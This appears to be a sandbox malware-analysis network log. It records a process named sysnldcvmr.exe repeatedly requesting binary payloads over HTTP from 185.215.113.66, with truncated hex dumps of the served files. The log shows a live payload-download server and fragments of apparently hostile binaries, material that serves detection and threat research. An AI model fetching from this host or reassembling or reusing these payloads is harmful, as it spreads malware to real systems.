Dec 5, 2024 17:33:35.407599926 CET	248	IN	Data Raw: e9 c3 ae 8e 6a d3 fc a6 86 82 41 8a fc 7e 31 e7 3c 59 3d 6a f3 b0 5d 45 4a 20 05 88 25 a9 6c a6 3e 02 3f 36 e5 aa 27 5e 1e 60 ea aa 20 34 96 cf 5b a1 27 b2 53 54 c3 14 79 01 c2 90 6f 30 32 3f 9e 49 33 5c 7b 23 41 b9 9a 64 6a 3b af 26 be 56 e8 63 Data Ascii: jA~1<Y=j]EJ %l>?6'^` 4['STyo02?I3\{#Adj;&Vcrt^DiTWrG3qw}CG?aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.11	50010	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:37.559835911 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:38.893277884 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:38 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Dec 5, 2024 17:33:38.893296003 CET	124	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
Dec 5, 2024 17:33:38.894095898 CET	1236	IN	Data Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35 Data Ascii: *B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7\|VbF9?gk{is6u_pi!
Dec 5, 2024 17:33:38.894140005 CET	1236	IN	Data Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65 Data Ascii: Ku"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
Dec 5, 2024 17:33:38.894154072 CET	248	IN	Data Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66 Data Ascii: >"W\|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
Dec 5, 2024 17:33:38.894974947 CET	1236	IN	Data Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec Data Ascii: `{nl;UfB5!59uGJ0hR!u(d:Serk)BdWmlE)Mt9G2?=L{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
Dec 5, 2024 17:33:38.895030975 CET	1236	IN	Data Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06 Data Ascii: ]KL\Bd@!qcBXfk=}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkdUDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
Dec 5, 2024 17:33:38.895040035 CET	248	IN	Data Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6 Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
Dec 5, 2024 17:33:38.895761013 CET	1236	IN	Data Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6 Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c\|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
Dec 5, 2024 17:33:38.895874023 CET	1236	IN	Data Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10 Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[
Dec 5, 2024 17:33:39.013165951 CET	248	IN	Data Raw: c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20 96 0b b5 51 59 b2 eb 86 49 f2 fd df a5 5f 55 95 cb 16 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb Data Ascii: uKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.11	50020	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:41.379803896 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:42.671423912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:42 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:33:42.671480894 CET	1236	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%H_bC@97U8,/&U5Ck]ocRO3hW\|
Dec 5, 2024 17:33:42.671504974 CET	1236	IN	Data Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da Data Ascii: !@.zFCR$*]x$x9\|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<pt
Dec 5, 2024 17:33:42.671518087 CET	1236	IN	Data Raw: cd d1 88 5e 0c ed 76 fb ad be 0a a0 18 35 82 a1 cb 1b 3e b3 21 1e 3e 41 05 44 f1 f3 d5 fe ad 57 3e 15 da 27 7e 21 35 8b 3d c0 9e 5b af ce d8 4e 88 c6 51 fe 94 d0 20 09 09 3f f8 77 0a 3a a9 b9 2f a3 a6 29 bb 72 f7 4b e7 60 04 4f b2 26 72 bc 69 0d Data Ascii: ^v5>!>ADW>'~!5=[NQ ?w:/)rK`O&riw`qN;W&Z/f$t9n9H4{(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h
Dec 5, 2024 17:33:42.671530962 CET	1236	IN	Data Raw: 35 fc a7 92 95 53 1b bd be 53 52 be 4b a2 f4 82 88 c5 e0 4b a2 af a1 30 22 42 1c 70 38 09 c4 ed 62 8b 0b 7a e7 ad 93 f0 25 76 c4 30 06 7b 6b db 2d 2c cc 58 d9 fd 19 8d 71 9c 6d 8e 12 ec 85 49 0b 1b a1 03 a7 23 77 0e 7a 39 b9 70 a8 f3 9f 2c 8a c1 Data Ascii: 5SSRKK0"Bp8bz%v0{k-,XqmI#wz9p,^[\|KVWQ-r)7/ C(<z@.&>Lh<#*Ija5_+8hPc aI>:XEL[ V;x)Yvz
Dec 5, 2024 17:33:42.671544075 CET	1236	IN	Data Raw: b5 16 89 e3 1a 92 1a f4 78 e0 97 b7 e5 c1 60 1d eb c5 3b 84 e4 1e cb e2 b8 ff 4e 3c 21 ef 9b e6 50 2d c1 1c 89 ea e3 5b 8f 98 3c 42 dd 56 f3 08 de 0c b9 d3 fb f9 f7 29 da c4 bf 5d e7 dd 09 93 ce d2 7a 1a 86 dc 5b 79 96 d2 25 f9 47 56 18 c6 3a 5e Data Ascii: x`;N<!P-[<BV)]z[y%GV:^X!$`T;(9zdg \|IlC#m"k/C%sQuyrdnV(b{"yM7BaEmG$bjW\1jNNCB@[9R6".r
Dec 5, 2024 17:33:42.671721935 CET	1236	IN	Data Raw: 00 a1 16 37 3d 44 c0 a0 ef a7 16 10 82 2f 33 39 99 1f 28 39 c9 fd 58 25 5d 10 ee 16 5a a7 07 0b f5 47 cf c0 1e b5 71 15 4d 3b b2 54 f3 0d 09 b5 eb 45 b5 2e d6 6e ba d2 c3 af 5b 9b 92 25 60 c4 c8 08 61 bf 8a 98 0d 77 56 4a d9 ce 56 88 75 59 48 c0 Data Ascii: 7=D/39(9X%]ZGqM;TE.n[%`awVJVuYHZtpcARt&IY-/smX-_t5~aajW!kOkZS>8BN9]74D}YzRrSEZWlG^7}
Dec 5, 2024 17:33:42.671773911 CET	1236	IN	Data Raw: 2e 76 8e aa b6 5d 84 18 8b 82 44 a6 5b 88 96 e0 fa 83 ea 50 e6 1c 59 9a 9a 8c 13 1d ba 1a f7 99 01 e9 d5 f9 c4 c4 e4 a1 99 b6 d3 63 05 43 e3 f0 a7 5e f2 e6 69 09 ec 94 26 7d 32 7b 32 70 34 91 a9 60 af 2d 02 c6 96 b6 fb 9c c3 23 d7 d8 cd 4c a1 c9 Data Ascii: .v]D[PYcC^i&}2{2p4`-#LlYjRO;AbsD!Y.FGMB-:Y.-:.xAV5iEARg"CS8e+-\GxB y94HefHfq(W{?zH
Dec 5, 2024 17:33:42.671787024 CET	1236	IN	Data Raw: e9 62 ef 74 5b 2c d4 1d ab ff 8b ed d4 be 2d 7a ec ba 23 33 25 61 bb 9b 57 d5 be c9 a4 b6 85 19 88 0d 0c be 9c 70 53 cb b8 2d 6d 84 12 1c 66 da cb 83 36 40 d7 50 d4 a0 9a 18 4c 40 cf fe 2b a2 35 a8 7f 19 c6 e3 30 5f f2 25 2a 6d d4 0e a4 db 89 ea Data Ascii: bt[,-z#3%aWpS-mf6@PL@+50_%m;Og>y{3yq~ZxTRb0WoD!BGcSM>sEDo@(6u?xY@T}TUhZ24"@G>YO1nqk>sY"U2
Dec 5, 2024 17:33:42.671801090 CET	1236	IN	Data Raw: 51 02 c8 ab 69 23 ff 9f 99 33 10 ca 2e c7 8e 3a dc 10 d6 42 3f 81 14 df 10 e5 66 f6 af ab 63 af 18 b0 74 4f 17 d5 b3 c2 e0 93 97 83 47 c3 7e 96 36 5a 94 be 65 b8 9a 82 09 c0 3f bf 66 81 ad 05 b3 7d 30 f1 1a 34 4e a5 05 32 78 b4 83 f5 21 7e d2 66 Data Ascii: Qi#3.:B?fctOG~6Ze?f}04N2x!~foTibiCMztDmKHjTu[7[wA=CI[Fo(Hl:eM@87!DRl[_x(4PYo4D<l1~Wp7xu; 5
Dec 5, 2024 17:33:42.792886972 CET	1236	IN	Data Raw: 11 b1 b6 17 db 8b 0c e4 5e 87 a9 e2 cf 1b 4d e6 5f c7 cb d3 51 51 da b4 9f 32 1b 11 86 4a 5e 61 b0 1b 46 de ba ad bb 8e 3a db 30 cb f0 fe 6c 8a a3 c1 c1 bb cc 2e 2a 60 c3 25 f4 29 9f cf 33 d0 78 ec 2e e6 1b 59 f4 95 78 82 9c d3 6a 44 a7 80 f7 0a Data Ascii: ^M_QQ2J^aF:0l.`%)3x.YxjD"}%WDyVxPPVP[wkXahRq^Uni2],F>PWh:1ja(,arx_+uJ]({P!^jLPPo>x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.11	50028	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:44.955337048 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:46.277050972 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:46 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
Dec 5, 2024 17:33:46.277100086 CET	1236	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|d
Dec 5, 2024 17:33:46.277110100 CET	248	IN	Data Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b Data Ascii: a;^;3\|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
Dec 5, 2024 17:33:46.277751923 CET	1236	IN	Data Raw: 94 73 8b aa f1 ce f6 fb 4d 3d f8 d5 0b 49 73 ea 19 24 fd 61 5a a1 ae 74 26 ce d4 c3 49 ba b6 a2 ff c7 ce 44 2e dc 20 cb 01 b2 a5 4d 7a d3 11 4c 32 a9 c1 56 37 18 06 0b 04 2a e4 ea 08 83 e9 51 49 0a ba bc b0 d1 a9 c4 8f 89 af 0e 75 b2 3b b5 35 bb Data Ascii: sM=Is$aZt&ID. MzL2V7QIu;5f;kIBw%zH-L=_k_/ipMf`N cNk^uHt(_fE:J{O&~p^oUA4VUM@^28Bb_Fk
Dec 5, 2024 17:33:46.277821064 CET	1236	IN	Data Raw: 78 1f b9 71 14 f8 5a 8e f8 e4 b5 04 49 01 a7 1a aa 0a e0 af 5e ac f8 9e 1d 6c 78 e5 c4 c6 c0 41 95 60 5f 7d 4b c6 63 80 8b 37 a8 fc b8 f2 e1 61 52 18 dd 8c cb b2 0b fc ef 6b c0 2f 3b 05 56 18 b0 29 28 39 21 95 0d 55 7d 8b 91 68 e8 e8 e9 73 f2 84 Data Ascii: xqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3aia>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(ou
Dec 5, 2024 17:33:46.277829885 CET	248	IN	Data Raw: 87 9c b7 44 2a f2 35 40 6d 77 32 c0 f8 65 a2 d2 24 fd 85 98 0a 2a de 08 ee 92 f4 29 7c 0f 13 14 55 30 42 e3 ee db 7b 77 f4 01 cc 78 7a 77 b9 64 06 d5 0a d3 04 b1 6f 0b ff 86 e6 69 1c 34 0b 7c 4a 1d fd 58 a5 96 f8 a3 c7 4f 1b 2c d4 73 5e 49 cb 81 Data Ascii: D5@mw2e$)\|U0B{wxzwdoi4\|JXO,s^I@Vs>?'/<AILTO8Jt)0ZbA,3Po+(v"!h3UIIgh\|>_C+]`OG3de{tlnAj}xA
Dec 5, 2024 17:33:46.278649092 CET	1236	IN	Data Raw: a3 6b 02 48 8e 39 47 cb 09 12 56 19 ec 5e 7a 6d 54 eb 7b ef c8 d8 b1 79 fc 3b fe 63 e7 7d 77 92 33 70 bb a9 52 ff 00 fa 79 3c 56 3d c6 35 ea 61 b9 80 1f 3d c3 f3 7f 0a a8 e1 64 a5 95 55 f8 59 8c 57 e8 9e 8e e9 2d d9 da e4 58 57 f2 b6 87 e0 f2 cd Data Ascii: kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00vq=,P1~#wRpvTW$Kz{]ok>IXj@U;[h`(LjmG#Opr[w9]
Dec 5, 2024 17:33:46.278682947 CET	1236	IN	Data Raw: ba 43 e5 3b ee 40 fb 35 38 a6 dc 48 a9 74 7d 75 c7 86 f5 b7 6f 73 e8 b1 fa 28 92 95 a5 68 91 da 2f 52 fd 82 ed 91 b8 fb 81 ee 23 60 71 fe a0 6b 98 15 f1 9f 31 a6 e9 23 61 5f 4a 78 3b 4a b9 9c 4f 29 6a c5 20 3c 53 b0 e3 07 e2 0a 1f 90 6d 8e 03 50 Data Ascii: C;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$ZvN?\|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@
Dec 5, 2024 17:33:46.278693914 CET	248	IN	Data Raw: fb d4 0c e1 da 53 a5 a4 95 56 4b 73 89 9c 6b 68 40 74 c8 fd 28 54 21 a1 a5 ba 13 c0 e5 2b 78 b5 0f 09 01 aa 52 3c 08 8e 21 65 cc d8 5f ea 95 b2 7b 8f d5 29 3b b1 b0 24 cb 00 32 1e f0 e3 e0 34 53 09 8f 17 38 71 fb 95 d1 d2 95 09 1a 89 77 b6 6a 18 Data Ascii: SVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN},@83607DBUIUhi3v+DQ?t5_}NgCb;Ql-o[9}@Gg~@kk3;w
Dec 5, 2024 17:33:46.279757977 CET	1236	IN	Data Raw: 3c e2 ef 0d 30 a3 a8 20 58 36 14 47 05 6a 36 aa 91 62 83 85 a2 06 91 02 fd 9f 8f c5 31 c7 54 90 84 32 3c fb 3d 04 03 e9 64 4d 70 cb d1 16 ae fa a1 ff 2e 88 d6 9f a3 a1 a0 74 06 d6 c7 2f 3e 2c 09 83 0f 8a 37 11 07 89 48 44 29 a3 e5 10 ae 61 2c 06 Data Ascii: <0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>kl@yNvf%[;K=x"Le%!;S4Tda(W=#8Nirp:2AJrc0nt@5
